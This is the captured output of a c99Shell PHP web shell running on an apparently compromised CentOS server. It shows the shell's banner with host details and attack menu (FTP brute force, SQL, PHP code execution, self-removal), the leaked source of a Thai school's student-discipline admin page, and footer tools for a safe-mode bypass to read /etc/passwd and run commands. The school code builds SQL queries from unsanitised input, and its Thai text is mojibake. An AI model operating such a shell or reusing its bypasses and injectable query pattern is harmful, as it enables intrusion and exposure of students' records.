110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage_22222/edu_depart/ drwxr-xr-x Free 52.63 GB of 127.8 GB (41.18%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

<?php
session_start();
 if (session_is_registered("valid_user")&&session_is_registered("Priority")&&session_is_registered("password") )
 {
include("../include/FunctionDB.php");
include("admin_menu.php");
include("../include/Function.php");
ConnectDB();
$sql = "Select * From student_tb Where Student_id='$Student_id'";
$result1 = mysql_query($sql) or die("Error ".mysql_error()); 
$rs = mysql_fetch_array($result1);
$strSQL = "Select * From std_punish_tb Where Student_id='$Student_id'";
if (! $Page)
$Page = 1;
$Pre_Page = $Page - 1;
$Next_Page = $Page +1;
$Per_Page =10;
$result = mysql_query($strSQL);

$Page_start = ($Per_Page*$Page) - $Per_Page;
$Num_Rows = mysql_num_rows($result);

if( $Num_Rows <= $Per_Page)
   $Num_Pages = 1;
else if (($Num_Rows % $Per_Page) == 0)
       $Num_Pages = ($Num_Rows / $Per_Page);
else
        $Num_Pages = ($Num_Rows / $Per_Page) + 1;
$Num_Pages = (int)$Num_Pages;

if (( $Page > $Num_Pages) || ($Page < 0))
  echo"Page $Page More than $Num_Pages";
$strSQL .=" LIMIT $Page_start,$Per_Page" ;
$result = mysql_query($strSQL); 
///////////////////////////////////////////////////////////////////////////////////
$num = mysql_num_rows( $result );
//$count = 0;
?>
<table width="835" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td width="835" ><br> 
          <fieldset>
            <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="Edu_Menu.php">Л№йТЛЕСЎ</a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="StudentList.php?Student_id=<? echo $rs[Student_id]?>">ўйНБЩЕ№СЎИЦЎЙТ</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="menu_std.php?Student_id=<? echo $rs[Student_id]?>">ўйНБЩЕ»ГРЗСµФ№СЎИЦЎЙТ</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="EditStudentList.php"></a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /><a href="AddPunish.php?Student_id=<? echo $rs[Student_id]?>"> аѕФиБўйНБЩЕ¤ЗТБјФґбЕРв·Й</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /><a href="EditPunishList.php?Student_id=<? echo $rs[Student_id]?>">бЎйдўўйНБЩЕ¤ЗТБјФґбЕРв·Й</a></font></legend>
            <label>
  <form id="form1" name="form1" method="post" action="DelPunish.php">
    <table width="97%" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#EEEEEE" >
      <tr bgcolor="#FDDCCE" >
        <td colspan="5"><div align="center"><font color="#003366" size="4" face="Tahoma"><strong><font color="#FF0000">бЎйдў</font> <font color="#000000">ГТВЎТГ</font></strong></font><font size="4" face="Tahoma, MS Sans Serif"><strong>ўйНБЩЕѕДµФЎГГБ 
          бЕР ЗФ№СВ №СЎИЦЎЙТ</strong></font></div></td>
      </tr>
      <tr bgcolor="#EEEEEE">
        <td width="32" bgcolor="#EEEEEE" style="border:1px solid gray"><div align="center"><font size="2" face="Tahoma"><strong>Еє</strong></font></div></td>
        <td width="37" style="border:1px solid gray"><div align="center"><font color="#003366" size="1" face="Tahoma"><strong>No.</strong></font></div></td>
        <td width="113" bgcolor="#EEEEEE" style="border:1px solid gray"><div align="center"><font size="2" face="Tahoma"><strong>ЗС№·Хи</strong></font></div></td>
        <td width="734" bgcolor="#EEEEEE" style="border:1px solid gray"><div align="center"><strong><font size="2" face="Tahoma">ѕДµФЎГГБ·Хи·УјФґ</font></strong></div></td>
        <td width="81" bgcolor="#EEEEEE" style="border:1px solid gray"><div align="center"><font size="2" face="Tahoma"><strong>бЎйдў</strong></font></div></td>
      </tr>
      <?
$i = 1;
 while($row = mysql_fetch_array($result))
 {

     if($count==0)
     {
?>
      <tr bordercolor="#EEEEEE" bgcolor="#FFFFFF" >
        <td bgcolor="#F7F7F7" ><div align="center">
            <input type="checkbox" name="checkbox[]" value="<? echo $row[code]?>" />
        </div></td>
        <td bgcolor="#F7F7F7" ><div align="center"><font color="#000000" size="2" face="Tahoma">
            <? 
     //(50*(currentpage-1))+i 
        $no = ($Per_Page * ( $Page -1))+$i ;
        echo $no;
        ?>
        </font></div></td>
        <td bgcolor="#F7F7F7" ><div align="center"><font color="#003366" size="2" face="Tahoma">
            <?php 
       $sday = $row[Date_note];
    $yearthai = explode("-",$sday);
    $day =      intval($yearthai[2]);
    $month =  intval($yearthai[1]);
    $year =     intval($yearthai[0]);     
          //////////////////
   $year =  getYear($year);
  $m = getThaiSubMonth($month);
     echo"$day"." "."$m"." "."$year";
    ?>
        </font></div></td>
        <td bgcolor="#F7F7F7" ><div align="left"><font color="#006633" size="2" face="Tahoma"> <? echo nl2br($row["Perform"])?> </font></div>
            <div align="left"><font color="#990099" size="2" face="Tahoma"> <a href="../Student/menu_std.php?Student_id=<?=$row["Student_id"]?>" title="Click to see Detail"  class="d"> </a> </font> </div></td>
        <td bgcolor="#F7F7F7" ><div align="center"><font color="#990099" size="2" face="Tahoma"><strong><a href="FrmEditPunish.php?code=<? echo $row[code]?>&amp;&amp;Student_id=<? echo $rs[Student_id]?>" class="c">бЎйдў</a></strong></font> </div></td>
      </tr>
      <?
    $count=1;
     }
else
{
?>
      <tr bordercolor="#EEEEEE" bgcolor="#FFFFFF">
        <td ><div align="center">
            <input type="checkbox" name="checkbox[]2" value="<? echo $row[code]?>" />
        </div></td>
        <td ><div align="center"><font color="#000000" size="2" face="Tahoma">
            <? 
     //(50*(currentpage-1))+i 
        $no = ($Per_Page * ( $Page -1))+$i ;
        echo $no;
        ?>
        </font></div></td>
        <td bgcolor="#FFFFFF" ><div align="center"><font color="#003366" size="2" face="Tahoma">
            <?php 
       $sday = $row[Date_note];
    $yearthai = explode("-",$sday);
    $day =      intval($yearthai[2]);
    $month =  intval($yearthai[1]);
    $year =     intval($yearthai[0]);     
          //////////////////
   $year =  getYear($year);
  $m = getThaiSubMonth($month);
     echo"$day"." "."$m"." "."$year";
    ?>
        </font></div></td>
        <td bgcolor="#FFFFFF" ><div align="left"><font color="#006633" size="2" face="Tahoma"><? echo nl2br($row["Perform"])?></font></div>
            <div align="left"><font color="#990099" size="2" face="Tahoma"> <a href="../Student/menu_std.php?Student_id=<?=$row["Student_id"]?>" title="Click to see Detail"  class="d"> </a> </font></div>
          <div align="left"><font color="#000000" size="2" face="Tahoma"> </font> </div></td>
        <td ><div align="center"><font color="#990099" size="2" face="Tahoma"><a href="../Student/menu_std.php?Student_id=<?=$row["Student_id"]?>" title="Click to see Detail"  class="d"> </a><strong><a href="FrmEditPunish.php?code=<? echo $row[code]?>&amp;&amp;Student_id=<? echo $rs[Student_id]?>" class="c">бЎйдў</a></strong></font></div></td>
      </tr>
      <?
$count=0;
}
$i++;
 }    
CloseDB();
?>
      <tr bgcolor="#EEEEEE">
        <td colspan="5"><div align="center">
            <input type="hidden" name="Student_id" value="<? echo $row[Student_id]?>" />
            <input type="submit" name="Submit" value="   Еє   " />
        </div></td>
      </tr>
      <tr bgcolor="#FDDCCE">
        <td height="22" colspan="5"><div align="center"><font color="#003366" size="2" face="Tahoma">·Сй§ЛБґ</font><font color="#FF0000" size="2" face="Tahoma"> <strong><? echo $num ?> </strong></font><font color="#003366" size="2" face="Tahoma">¤ГСй§</font></div></td>
      </tr>
    </table>
    <table width="98%" border="0" cellpadding="0" cellspacing="1" bordercolor="#99CCFF">
      <tr>
        <td align="right" bordercolor="#CCCCCC" class="Tahoma11"><div align="center"><font color="#FFFFFF"> <font color="#FFFFFF" size="3" face="MS Sans Serif"><strong> <font color="#0033CC" size="2" face="Tahoma"><?php echo $Num_Pages;?></font></strong></font><font size="2" face="Tahoma"><strong>&nbsp;</strong><font color="#000000">Л№йТ</font></font> <font color="#0033CC" size="2" face="Tahoma"> <strong>
            <?php
if ($Pre_Page)
   echo"<a href=\"$PHP_SELF?Page=$Pre_Page\" class=\"PageLink\"><font =\"Ms San serif\" size=\"2\"><b>&lt;&lt; Previus</b> </font></a>";

   for($i=1;$i<=$Num_Pages;$i++)
   {
    if($i != $Page)
         echo" [<a href=\"$PHP_SELF?Page=$i\" class=\"PageLink\"><font =\"Ms San serif\" size=\"2\"><b>$i</b></font></a>] ";
    else
        echo"<b>$i</b>";
   }
if($Page != $Num_Pages)
 echo"<a href=\"$PHP_SELF?Page=$Next_Page\" class=\"PageLink\"><font =\"Ms San serif\" size=\"2\"><b> Next &gt;&gt;</b> </font></a>";
 ?>
        </strong></font> </font> </div></td>
      </tr>
    </table>
    </form>
          </fieldset>
        <br>
        <font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2"><b>ЛБТВаЛµШ :</b> гЄйаБТКм¤ЕФЎ·ХиЄЧиН<br>
      </font></td>
    </tr>
</table>
<?php 
    }
else
{
       echo"<meta http-equiv=\"refresh\" content=\"3;URL=../login.php\">\n";
       echo"Please Login ";
}
?>
:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:
:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/
:: Command execute ::
Enter:	Select: